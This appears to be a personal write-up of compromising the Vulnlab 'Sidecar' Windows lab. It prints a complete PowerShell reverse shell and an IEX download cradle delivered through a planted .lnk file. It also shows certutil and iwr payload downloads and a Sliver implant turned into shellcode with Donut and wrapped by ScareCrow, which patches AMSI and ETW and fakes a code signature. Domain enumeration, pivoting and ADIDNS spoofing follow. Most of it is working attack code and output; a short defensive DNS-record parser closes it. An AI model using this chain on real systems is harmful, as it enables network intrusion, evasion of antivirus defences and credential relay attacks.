vulnlab-sidecar


a very hard Windows machine

Preparing the Shellcode

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ cat puckshell.txt
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
# Setup IPADDR
$address = '10.8.2.138'
# Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}


Create a malicious link on a Windows PC

I used:

powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://10.8.2.138/puckshell.txt')))


Uploading the malicious link file

└─$ smbclient //DC01.sidecar.vl/Public

Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> shares
shares: command not found
smb: \> ls
  .                                   D        0  Sun Dec 10 15:29:38 2023
  ..                                DHS        0  Sun Dec 10 15:20:57 2023
  Backup                              D        0  Sun Dec 10 15:29:37 2023
  Common                              D        0  Sun Dec 17 12:09:03 2023
  Install                             D        0  Sun Dec 10 15:51:08 2023
  Transfer                            D        0  Sun Dec 10 15:29:32 2023

        6291455 blocks of size 4096. 2227213 blocks available
smb: \> cd Common
smb: \Common\> ls
  .                                   D        0  Sun Dec 17 12:09:03 2023
  ..                                  D        0  Sun Dec 10 15:29:38 2023
  Common.lnk                          A     1741  Sun Dec 10 15:47:04 2023
  Custom                              D        0  Sun Dec 17 12:14:14 2023
  Install.lnk                         A     1666  Sun Dec 10 15:47:05 2023
  Transfer.lnk                        A     1681  Sun Dec 10 15:47:05 2023

        6291455 blocks of size 4096. 2227210 blocks available
smb: \Common\> cd Custom
smb: \Common\Custom\> ls
  .                                   D        0  Sun Dec 17 12:14:14 2023
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

        6291455 blocks of size 4096. 2227210 blocks available

smb: \Common\Custom\> rm *.lnk
smb: \Common\Custom\> put hillie3.lnk
putting file hillie3.lnk as \Common\Custom\hillie3.lnk (22.8 kb/s) (average 0.4 kb/s)
smb: \Common\Custom\> ls
  .                                   D        0  Wed Jul 17 16:30:06 2024
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  hillie3.lnk                         A     2006  Wed Jul 17 16:30:06 2024
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

        6291455 blocks of size 4096. 2237771 blocks available
smb: \Common\Custom\>

Serving the shell

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ python3 -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.143.214 - - [17/Jul/2024 16:26:20] "GET /rcat.exe HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:30:16] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:32:20] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:33:20] "GET /puckshell.txt HTTP/1.1" 200 -


Getting the shell

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ rlwrap nc -nlvp 443                        
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.143.214] 49817
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\WINDOWS\System32\WindowsPowerShell\v1.0>whoami
sidecar\e.klaymore

C:\WINDOWS\System32\WindowsPowerShell\v1.0>cd c:\users\

c:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users

11/30/2023  11:55 PM    <DIR>          .
11/30/2023  11:55 PM    <DIR>          ..
01/12/2024  05:59 PM    <DIR>          Admin
12/02/2023  01:24 PM    <DIR>          administrator
01/12/2024  05:50 PM    <DIR>          e.klaymore
11/30/2023  05:49 PM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)   3,720,708,096 bytes free

c:\Users>cd e.klaymore

c:\Users\e.klaymore>cd desktop

c:\Users\e.klaymore\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users\e.klaymore\Desktop

12/01/2023  09:26 AM    <DIR>          .
12/01/2023  09:26 AM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)   3,720,572,928 bytes free

c:\Users\e.klaymore\Desktop>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

c:\Users\e.klaymore\Desktop>net users

User accounts for \\WS01

-------------------------------------------------------------------------------
Admin                    Administrator            DefaultAccount           
Deployer                 Gast                     
The command completed successfully.


c:\Users\e.klaymore\Desktop>

So we have:

c:\Users\e.klaymore\Desktop>net user

User accounts for \\WS01

-------------------------------------------------------------------------------
Admin                    Administrator            DefaultAccount           
Deployer                 Gast                     
The command completed successfully.


c:\Users\e.klaymore\Desktop>net user /domain
The request will be processed at a domain controller for domain Sidecar.vl.


User accounts for \\DC01.Sidecar.vl

-------------------------------------------------------------------------------
A.Roberts                Administrator            E.Klaymore               
Guest                    J.Chaffrey               krbtgt                   
M.smith                  O.osvald                 P.robinson               
svc_deploy               
The command completed successfully.

.

c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/nc64.exe nc64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\temp

07/17/2024  05:57 PM    <DIR>          .
07/17/2024  05:57 PM    <DIR>          ..
07/17/2024  05:57 PM            45,272 nc64.exe
               1 File(s)         45,272 bytes
               2 Dir(s)   3,713,388,544 bytes free

Start Sliver C2

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sudo systemctl start sliver
[sudo] password for puck: 
                                                                                             
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver                     
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain deathtouch
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > generate --mtls 10.8.2.138 --os windows --arch amd64 --format exe 

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 20s
[*] Implant saved to /home/puck/vulnlab/sidecar/EVIL_USUAL.exe

sliver >  

Let's turn this file into shellcode with Donut:

┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ./donut payload.exe            

  [ Donut shellcode generator v0.9.3
  [ Copyright (c) 2019 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "payload.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP     : continue
  [ Shellcode     : "loader.bin"
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ls
donut  donut.1  EVIL_USUAL.exe  examples  lib  LICENSE  loader.bin  payload.exe  README.html

Then wrap the shellcode with ScareCrow:

┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ./ScareCrow -I loader.bin --domain microsoft.com
 
  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
    \/     \/     \/            \/        \/                      
                            (@Tyl0us)
    “Fear, you must understand is more than a mere obstacle. 
    Fear is a TEACHER. the first one you ever had.”
    
[!] Missing Garble... Downloading it now
[*] Encrypting Shellcode Using ELZMA Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2584 milliseconds 
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneNote's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing OneNote.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of OneNote.exe: ad60fffef99119074e16c057982bc80cb5b4bf56f97006f6ca3de989d547ddb6
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ls
Cryptor  go.sum       Loader      main.json    README.md  ScareCrow.go  Struct
go.mod   limelighter  loader.bin  OneNote.exe  ScareCrow  Screenshots   Utils
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ 

I got a session, but after uploading SharpHound.exe my Sliver session gets disconnected.

sliver > sessions

[*] No sessions 🙁

[*] Session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:52:52 CEST

sliver > use 2a9abc07-3992-40be-918f-375eee061970

[*] Active session EVIL_USUAL (2a9abc07-3992-40be-918f-375eee061970)

sliver (EVIL_USUAL) > info

        Session ID: 2a9abc07-3992-40be-918f-375eee061970
              Name: EVIL_USUAL
          Hostname: ws01
              UUID: ec2f60bf-8718-2ae6-cabf-54c56e35f9d2
          Username: SIDECAR\E.Klaymore
               UID: S-1-5-21-3976908837-939936849-1028625813-1609
               GID: S-1-5-21-3976908837-939936849-1028625813-513
               PID: 3812
                OS: windows
           Version: 10 build 10240 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://10.8.2.138:8888
    Remote Address: 10.10.151.22:49977
         Proxy URL: 
Reconnect Interval: 1m0s
     First Contact: Thu Jul 18 08:52:52 CEST 2024 (41s ago)
      Last Checkin: Thu Jul 18 08:52:52 CEST 2024 (41s ago)

sliver (EVIL_USUAL) > ls

c:\temp (2 items, 33.6 MiB)
===========================
-rw-rw-rw-  nc64.exe  44.2 KiB  Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe   33.6 MiB  Thu Jul 18 08:49:01 +0200 2024


sliver (EVIL_USUAL) > whoami 

Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore
sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:33 +0200 2024


sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:53 +0200 2024


[!] Lost session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:55:31 CEST

[!] Active session disconnected

sliver (EVIL_USUAL) > execute-assembly -i -E /SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"

So we need the beacon.exe in a new .lnk file:

C:\Windows\System32\cmd.exe /c powershell -c iwr http://10.8.2.138/beacon.exe -o C:\windows\tasks\beacon.exe; C:\windows\tasks\beacon.exe

.

I created a working beacon and transferred it to the box with

certutil.exe -urlcache -f http://10.8.2.138/powerpoint.exe power.exe

and ran c:\programdata\power.exe on the box.

.

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain persist
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

sliver > https --lport 8443

[*] Starting HTTPS :8443 listener ...

[*] Successfully started job #2

[!] Job #2 stopped (tcp/https)

[!] Job #2 stopped (tcp/https)

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

               

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

[*] Beacon f4937c47 sitecar-3 - 10.10.177.38:50444 (ws01) - windows/amd64 - Mon, 14 Oct 2024 20:21:04 CEST

sliver > use f4937c47-c290-4c60-a7bc-438fcf292b8d

[*] Active beacon sitecar-3 (f4937c47-c290-4c60-a7bc-438fcf292b8d)

sliver (sitecar-3) > whoami

Logon ID: SIDECAR\E.Klaymore
[*] Tasked beacon sitecar-3 (952ffb7c)

[+] sitecar-3 completed task 952ffb7c


sliver (sitecar-3) >  

.

sliver (sitecar-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup

[*] Tasked beacon sitecar-3 (15da41ae)

sliver (sitecar-3) > ls

[*] Tasked beacon sitecar-3 (a86427ba)

[+] sitecar-3 completed task a86427ba

c:\ProgramData\temp (0 items, 0 B)
==================================


[+] sitecar-3 completed task 15da41ae

[*] sharp-hound-4 output:
2024-10-23T08:49:59.4279652+02:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-10-23T08:49:59.8243987+02:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2024-10-23T08:49:59.8747021+02:00|INFORMATION|Initializing SharpHound at 8:49 AM on 10/23/2024
2024-10-23T08:50:00.0784908+02:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for Sidecar.vl : DC01.Sidecar.vl

2024-10-23T08:50:48.7730432+02:00|INFORMATION|Saving cache with stats: 295 ID to type mappings.
 297 name to SID mappings.
 2 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-10-23T08:50:48.8487177+02:00|INFORMATION|SharpHound Enumeration Completed at 8:50 AM on 10/23/2024! Happy Graphing!

[*] Output saved to /tmp/sharp-hound-4_.2445145387.log

sliver (sitecar-3) > ls

[*] Tasked beacon sitecar-3 (0b9f5da2)

[+] sitecar-3 completed task 0b9f5da2

c:\ProgramData\temp (2 items, 83.9 KiB)
=======================================
-rw-rw-rw-  20241023085045_BloodHound.zip                         31.2 KiB  Wed Oct 23 08:50:48 +0200 2024
-rw-rw-rw-  Y2RjZTMzZTktMzhkNS00MDAwLTkwZTUtM2MwNDdmM2QyMzRj.bin  52.7 KiB  Wed Oct 23 08:50:48 +0200 2024


sliver (sitecar-3) > download 20241023085045_BloodHound.zip

[*] Tasked beacon sitecar-3 (44459e36)

[+] sitecar-3 completed task 44459e36

[*] Wrote 31936 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/sidecar/20241023085045_BloodHound.zip

sliver (sitecar-3) >  

To be continued …

First we need to promote our beacon to a session to be able to run execute-shellcode.


Warning: if we use the interactive-shellcode session, we need to restart the Sliver server afterwards to execute assemblies.

So, like this:

sliver > sessions 

[*] No sessions 🙁

[*] Beacon e5de6c1f sitecar-3 - 10.10.173.118:50379 (ws01) - windows/amd64 - Fri, 25 Oct 2024 08:55:46 CEST

sliver > use e5de6c1f-8a91-454b-9154-8006649aa751

[*] Active beacon sitecar-3 (e5de6c1f-8a91-454b-9154-8006649aa751)

sliver (sitecar-3) > interactive 

[*] Using beacon's active C2 endpoint: https://10.8.2.138:8443
[*] Tasked beacon sitecar-3 (85062590)

[*] Session 23eb3ba7 sitecar-3 - 10.10.173.118:50418 (ws01) - windows/amd64 - Fri, 25 Oct 2024 08:57:02 CEST

sliver (sitecar-3) > use 23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39

[*] Active session sitecar-3 (23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39)

sliver (sitecar-3) > sessions

 ID         Transport   Remote Address        Hostname   Username             Operating System   Health  
========== =========== ===================== ========== ==================== ================== =========
 23eb3ba7   http(s)     10.10.173.118:50418   ws01       SIDECAR\E.Klaymore   windows/amd64      [ALIVE] 

sliver (sitecar-3) > ^C
input Ctrl-c once more to exit
sliver (sitecar-3) > ^C
interrupted
                                                                                                                     

And then run execute-shellcode -i /tmp/UnmanagedPowerShell.bin:

sliver (sitecar-3) > ^C
interrupted
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

    ███████╗██╗     ██╗██╗   ██╗███████╗██████╗
    ██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗
    ███████╗██║     ██║██║   ██║█████╗  ██████╔╝
    ╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗
    ███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║
    ╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝

All hackers gain fear
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

sliver > sessions

 ID         Transport   Remote Address        Hostname   Username             Operating System   Health  
========== =========== ===================== ========== ==================== ================== =========
 23eb3ba7   http(s)     10.10.173.118:50418   ws01       SIDECAR\E.Klaymore   windows/amd64      [ALIVE] 

sliver > use 23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39

[*] Active session sitecar-3 (23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39)

sliver (sitecar-3) > execute-shellcode -i /tmp/UnmanagedPowerShell.bin

[*] Started remote shell with pid 2108

PS > dir


    Directory: C:\temp


Mode                LastWriteTime         Length Name                                              
----                -------------         ------ ----                                              
-a----       10/25/2024   8:53 AM       24830704 power.exe                                         



PS > New-ADIDNSNode -Tombstone -Verbose -Node puck.sidecar.vl -Data 10.8.2.138
VERBOSE: [+] Domain Controller = DC01.Sidecar.vl
VERBOSE: [+] Domain = Sidecar.vl
VERBOSE: [+] Forest = Sidecar.vl
VERBOSE: [+] ADIDNS Zone = Sidecar.vl
VERBOSE: [+] Distinguished Name = DC=puck.sidecar.vl,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-18-01-00-00-00-00-02-58-00-00-00-00-0F-B0-38-00-0A-08-02-8A
[+] ADIDNS node puck.sidecar.vl added

PS > 

.

sliver (sitecar-3) > execute-assembly -i -E /tmp/SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"

snip...2024-10-25T12:13:31.9634793+02:00|INFORMATION|Saving cache with stats: 58 ID to type mappings.
 59 name to SID mappings.
 1 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-10-25T12:13:31.9939532+02:00|INFORMATION|SharpHound Enumeration Completed at 12:13 PM on 10/25/2024! Happy Graphing!

[*] Tasked beacon sitecar-3 (e2afe45b)

[+] sitecar-3 completed task e2afe45b

We can see that we can't create new machine accounts (ms-ds-machineaccountquota = 0):

sliver (sitecar-3) > inline-execute-assembly /tmp/StandIn_v13_Net45.exe "--object ms-DS-MachineAccountQuota=*"

[*] Tasked beacon sitecar-3 (189947d6)

sliver (sitecar-3) > execute-assembly /tmp/StandIn_v13_Net45.exe "--object ms-DS-MachineAccountQuota=*"

[*] Tasked beacon sitecar-3 (c7f43d96)

sliver (sitecar-3) > tasks 

 ID         State       Message Type            Created                          Sent                             Completed                      
========== =========== ======================= ================================ ================================ ================================
 c7f43d96   sent        InvokeExecuteAssembly   Fri, 25 Oct 2024 15:39:01 CEST   Fri, 25 Oct 2024 15:39:07 CEST                                  
 74051079   sent        RegisterExtension       Fri, 25 Oct 2024 15:37:55 CEST   Fri, 25 Oct 2024 15:37:59 CEST                                  
 189947d6   sent        CallExtension           Fri, 25 Oct 2024 15:37:55 CEST   Fri, 25 Oct 2024 15:37:59 CEST                                  
 a730ea0b   completed   Download                Fri, 25 Oct 2024 15:18:49 CEST   Fri, 25 Oct 2024 15:18:56 CEST   Fri, 25 Oct 2024 15:18:56 CEST 
 db7bfb31   completed   Pwd                     Fri, 25 Oct 2024 15:18:19 CEST   Fri, 25 Oct 2024 15:18:22 CEST   Fri, 25 Oct 2024 15:18:22 CEST 


[+] sitecar-3 completed task c7f43d96

[*] Output:

[?] Using DC : DC01.Sidecar.vl
[?] Object   : DC=Sidecar
    Path     : LDAP://DC=Sidecar,DC=vl

[?] Iterating object properties

[+] ridmanagerreference
    |_ CN=RID Manager$,CN=System,DC=Sidecar,DC=vl
[+] objectcategory
    |_ CN=Domain-DNS,CN=Schema,CN=Configuration,DC=Sidecar,DC=vl
[+] msds-nctype
    |_ 0
[+] systemflags
    |_ -1946157056
[+] minpwdage
    |_ -864000000000
[+] dscorepropagationdata
    |_ 1/1/1601 12:00:00 AM
[+] uascompat
    |_ 0
[+] usnchanged
    |_ 110627
[+] instancetype
    |_ 5
[+] creationtime
    |_ 133743100080295319
[+] pwdhistorylength
    |_ 24
[+] ms-ds-machineaccountquota
    |_ 0
[+] subrefs
    |_ DC=ForestDnsZones,DC=Sidecar,DC=vl
    |_ DC=DomainDnsZones,DC=Sidecar,DC=vl
    |_ CN=Configuration,DC=Sidecar,DC=vl
[+] lockoutduration
    |_ -18000000000
[+] name
    |_ Sidecar

.

This means we can't perform an RBCD attack (https://www.thehacker.recipes/a-d/movement/kerberos/delegations/rbcd#rbcd-on-spn-less-users), as we would need another computer or service account that we control.

sliver (sitecar-3) > execute-shellcode -i /payloads/UnmanagedPowerShell.bin

[*] Started remote shell with pid 1652

PS > pwd

Path            
----            
C:\Windows\Tasks

.

# on sliver
[server] sliver (sitecar-3) > socks5 start

[*] Started SOCKS5 127.0.0.1 1081  

# on local machine
proxychains -q nxc smb 192.168.100.101 -u 'puck' -p ''

.

Webdav

We first need the authentication request or hash from our machine account. As we can't relay SMB to SMB (or LDAP), we need to change our source to HTTP.
For this we need to enable WebDAV (https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/webclient).

We can check the current status using https://github.com/G0ldenGunSec/GetWebDAVStatus/

From a session (not a beacon) run:

sliver (sitecar-3) > upload GetWebDAVStatus.exe

[*] Wrote file to c:\Windows\Tasks\GetWebDAVStatus.exe

sliver (sitecar-3) > execute -o "GetWebDAVStatus.exe" "127.0.0.1" 

[*] Output:
[+] WebClient service is active on 127.0.0.1

sliver (sitecar-3) > execute "cmd.exe" "/c net use h: http://10.8.2.138/blub"

[*] Command executed successfully

sliver (sitecar-3) >  

DNS

WebDAV only works if we use a DNS name for our target, so we first need to add a new DNS entry to AD: https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/adidns-spoofing

For this we can use Powermad (https://github.com/Kevin-Robertson/Powermad), even from a newly spawned interactive shell.

I used this sliver shellcode: https://github.com/mmnoureldin/UnmanagedPowerShell?tab=readme-ov-file which also contains Powermad

Warning: if we use the interactive-shellcode session, we need to restart the Sliver server afterwards to execute assemblies.

So we run execute-shellcode -i /payloads/UnmanagedPowerShell.bin, and then we add a DNS entry with New-ADIDNSNode -Tombstone -Verbose -Node kali.sidecar.vl -Data 10.8.2.138

.

sliver (sitecar-3) > execute-shellcode -i /payloads/UnmanagedPowerShell.bin

[*] Started remote shell with pid 3364

PS > pwd

Path            
----            
C:\Windows\Tasks



PS > New-ADIDNSNode -Tombstone -Verbose -Node kali.sidecar.vl -Data 10.8.2.138
VERBOSE: [+] Domain Controller = DC01.Sidecar.vl
VERBOSE: [+] Domain = Sidecar.vl
VERBOSE: [+] Forest = Sidecar.vl
VERBOSE: [+] ADIDNS Zone = Sidecar.vl
VERBOSE: [+] Distinguished Name = DC=kali.sidecar.vl,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-1E-01-00-00-00-00-02-58-00-00-00-00-62-B1-38-00-0A-08-02-8A
[+] ADIDNS node kali.sidecar.vl added

PS > 
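As an added defensive example (my own code, not from the writeup nor from Powermad): the VERBOSE DNSRecord line above is a raw MS-DNSP DNS_RPC_RECORD, and parsing it lets a defender audit dnsRecord attributes pulled from the DomainDnsZones partition and flag A records that point outside the ranges the zone should hold. The two hex blobs are the ones printed above; the allowed range 10.10.0.0/16 is an assumption for the demo.

```python
"""Parse the dnsRecord blob that ADIDNS writes for a node (MS-DNSP DNS_RPC_RECORD)
and flag A records whose address lies outside the ranges the zone should hold."""
import ipaddress
import struct
from datetime import datetime, timedelta, timezone

# The two DNSRecord values printed by New-ADIDNSNode in this writeup.
RECORD_PUCK = "04-00-01-00-05-F0-00-00-18-01-00-00-00-00-02-58-00-00-00-00-0F-B0-38-00-0A-08-02-8A"
RECORD_KALI = "04-00-01-00-05-F0-00-00-1E-01-00-00-00-00-02-58-00-00-00-00-62-B1-38-00-0A-08-02-8A"

DNS_TYPE_A = 1
RANK_ZONE = 0xF0                      # authoritative zone record
WIN_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
HEADER_LEN = 24


def parse_dns_record(hex_blob):
    """Decode one dnsRecord value (dash-separated or plain hex) into a dict.

    Layout: DataLength(2) Type(2) Version(1) Rank(1) Flags(2) Serial(4)
            TtlSeconds(4, network order) Reserved(4) TimeStamp(4) Data(DataLength)
    Every field is little-endian except TtlSeconds. TimeStamp is hours since
    1601-01-01 UTC (0 means the record is not aged).
    """
    raw = bytes.fromhex(hex_blob.replace("-", "").replace(" ", ""))
    if len(raw) < HEADER_LEN:
        raise ValueError("dnsRecord header truncated")
    data_len, rtype, version, rank, flags, serial = struct.unpack_from("<HHBBHI", raw, 0)
    (ttl,) = struct.unpack_from(">I", raw, 12)
    _reserved, timestamp = struct.unpack_from("<II", raw, 16)
    data = raw[HEADER_LEN:HEADER_LEN + data_len]
    if len(data) != data_len:
        raise ValueError("dnsRecord data shorter than DataLength")
    rec = {
        "type": rtype, "version": version, "rank": rank, "flags": flags,
        "serial": serial, "ttl": ttl, "data": data,
        "created": WIN_EPOCH + timedelta(hours=timestamp) if timestamp else None,
    }
    if rtype == DNS_TYPE_A and data_len == 4:
        rec["address"] = str(ipaddress.IPv4Address(data))
    return rec


def audit_a_records(nodes, allowed_nets):
    """nodes: iterable of (node_name, hex_blob). Returns (name, address, created)
    for every A record whose address is outside allowed_nets."""
    nets = [ipaddress.ip_network(n) for n in allowed_nets]
    findings = []
    for name, blob in nodes:
        rec = parse_dns_record(blob)
        if "address" not in rec:
            continue                  # only A records are checked here
        addr = ipaddress.ip_address(rec["address"])
        if not any(addr in net for net in nets):
            findings.append((name, rec["address"], rec["created"]))
    return findings


if __name__ == "__main__":
    # Assumed: the lab's own hosts live in 10.10.0.0/16; anything else is suspect.
    nodes = [("puck.sidecar.vl", RECORD_PUCK), ("kali.sidecar.vl", RECORD_KALI)]
    for name, addr, created in audit_a_records(nodes, ["10.10.0.0/16"]):
        print(f"{name} -> {addr} (created {created:%Y-%m-%d %H:%M} UTC)")
```

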